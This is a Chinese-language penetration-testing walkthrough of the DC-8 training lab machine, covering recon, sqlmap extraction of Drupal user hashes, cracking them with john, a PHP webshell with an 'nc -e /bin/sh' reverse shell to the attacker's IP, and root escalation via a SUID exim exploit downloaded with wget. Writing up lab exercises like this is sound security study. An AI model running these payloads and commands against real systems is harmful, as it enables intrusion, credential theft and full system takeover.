【DC系列】DC-8靶机渗透练习

DC-8靶机：

1.主机发现：arp-scan -l，发现靶机ip为192.168.225.152

2.nmap扫描端口：

nmap 192.168.225.152 -sV -sC -Pn -n -v -T5 -p-

扫描到22和80端口，访问80端口

3.访问一下，看到drupal框架，点击任意链接，发现类似注入点的地方，测试发现是数字型注入

4.sqlmap可以流程化的跑一跑：

python sqlmap.py -u "http://192.168.225.152/?nid=1%27" --dbs
python sqlmap.py -u "http://192.168.225.152/?nid=1%27" --dbs -D d7db --tables
python sqlmap.py -u "http://192.168.225.152/?nid=1%27" --dbs -D d7db -T users --columns
python sqlmap.py -u "http://192.168.225.152/?nid=1%27" --dbs -D d7db -T users -C "uid,name,pass" --dump

5.将密码复制在文档中，文档内容，注意不能多出空格

admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

6.使用john进行密码爆破：

john dc8

7.现在进行目录扫描，需要找到输入账号密码的地方：

python dirsearch.py -u http://192.168.225.152 -e * -i 200

8.访问/user/login并登录成功，通过Add content–>Webform–>From settings去添加webshell，注意选择PHP code，同时，这里php代码前最好有一些其他内容，为了避免一些未知错误

<?php system("nc -e /bin/sh 192.168.225.133 1234");?>

9.写好shell后点击保存配置，回到view里填写自定义内容并提交，提交后便执行了刚刚的webshell，在提交前先在kali监听端口

python -c 'import pty;pty.spawn("/bin/bash")'

exim4命令提权：

1.查找提权命令：exim命令在使用时具有root权限

find / -perm -u=s -type f 2>/dev/null

2.使用msfconsole：

searchsploit exim 4

 

3.将这个exp传到靶机上，赋予执行权限，执行会报错：

python3 -m http.server 80
wget 192.168.225.133/46996.sh /tmp

4.查询得知是因为这个shell是在windows下编写的，所以换行格式与Linux不同，运行后无法解析，要将46996.sh文件转换成unix下可执行文件即可正常运行：

dos2unix 46996.sh

5.在攻击机处理好脚本文件，重新上传导靶机并赋予可执行权限，查看46996.sh脚本内容选择执行一下命令，完成提权：

 

chmod 777 46996.sh
./46996.sh -m netcat

 

6.根目录的flag：

整体流程如下：

主机发现=>端口扫描=>访问web服务=>sql注入拿到用户信息=>john破解密码=>后台RCE反弹shell=>查找设置SUID文件=>收集版本信息=>找对应exp提权=>找到flag。

linux里面有个suid权限执行二进制文件，这个权限涉及的命令权限都很大。